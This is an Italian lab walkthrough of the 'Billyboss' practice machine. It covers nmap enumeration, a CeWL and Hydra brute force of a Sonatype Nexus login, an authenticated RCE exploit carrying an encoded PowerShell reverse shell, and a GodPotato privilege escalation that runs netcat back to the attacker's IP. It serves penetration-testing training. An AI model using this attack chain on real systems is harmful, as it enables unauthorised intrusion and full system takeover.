Vai al contenuto

Billyboss

Network

  • IP Target: 192.168.121.61

Enumeration

PORT SERVICE VERSION DESCRIPTION
21 ftp FTP
80 http BaGet
135 msrpc MSRPC
445 microsoft-ds SMB
5040 unknown
8081 blackice-icecap Sonatype Nexus Repository Manager (OSS 3.21.0-05)
49664 unknown
49665 unknown
49666 unknown
49667 unknown
49668 unknown
49669 unknown
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.121.61                               
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 11:08 CET
Nmap scan report for 192.168.121.61
Host is up (0.067s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
8081/tcp  open  blackice-icecap
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Exploit

Il servizio Sonatype Nexus Repository Manager sembrerebbe vulnerabile all'exploit 49385 ma è utilizzabile solo dopo essersi autenticati.

Sonatype Nexus Repository Manager

Nel servizio non vengono utilizzate credenziali standard, procedo quindi con un brute force tramite Hydra.

Le credenziali non vengono trovate su le liste standard come ad esempio rockyou.

Procedo a creare una lista custom:

Bash
cewl http://192.168.121.61:8081/ | grep -v CeWL > custom-wordlist.txt
cewl --lowercase http://192.168.121.61:8081/ | grep -v CeWL  >> custom-wordlist.txt

E riprovo con Hydra:

Bash
# -I : ignore any restore files
# -f : stop when a login is found
# -L : username list
# -P : password list
# ^USER64^ and ^PASS64^ tells hydra to base64-encode the values
# C=/ tells hydra to establish session cookies at this URL
# F=403 tells hydra that HTTP 403 means invalid login
hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.121.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.121.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-20 16:07:54
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1600 login tries (l:40/p:40), ~100 tries per task
[DATA] attacking http-post-form://192.168.121.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403
[8081][http-post-form] host: 192.168.121.61   login: nexus   password: nexus
[STATUS] attack finished for 192.168.121.61 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-20 16:08:23

Credenziali trovate:

  • nexus:nexus

A questo punto posso utilizzare l'exploit 49385. Modifico il CMD aggiungendo il payload per una reverse shell (powershell base64) :

Bash
[...]
URL='http://192.168.121.61:8081'
#CMD='cmd.exe /c calc.exe'
CMD='cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwAyACIALAA0ADQANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
USERNAME='nexus'
PASSWORD='nexus'
[...]

e apro un listener sulla porta 4455:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ nc -nvlp 4455           
listening on [any] 4455 ...

Eseguo l'exploit:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ python 49385.py                   
Logging in
Logged in successfully
Command executed

E si apre la shell sul listener:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ nc -nvlp 4455           
listening on [any] 4455 ...
connect to [192.168.45.172] from (UNKNOWN) [192.168.121.61] 50336

PS C:\Users\nathan\Nexus\nexus-3.21.0-05>

A questo punto recupero la flag local.txt:

Local Flag

Privilege Escalation

Controllo i privilegi:

PowerShell
PS C:\Users\nathan\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Provo a sfruttare il privilegio SeImpersonatePrivilege usando GodPotato-NET4.exe.

PowerShell
PS C:\Users\nathan\Nexus> .\GodPotato-NET4.exe -cmd "cmd /c C:\Users\nathan\Nexus\nc.exe 192.168.45.172 4444 -e cmd"

e sono loggato come SYSTEM (anche se il comando whoami non restituisce output)

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ nc -nvlp 4444
listening on [any] 4444 ...

connect to [192.168.45.172] from (UNKNOWN) [192.168.121.61] 49798
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Recupero la flag proof.txt:

System Flag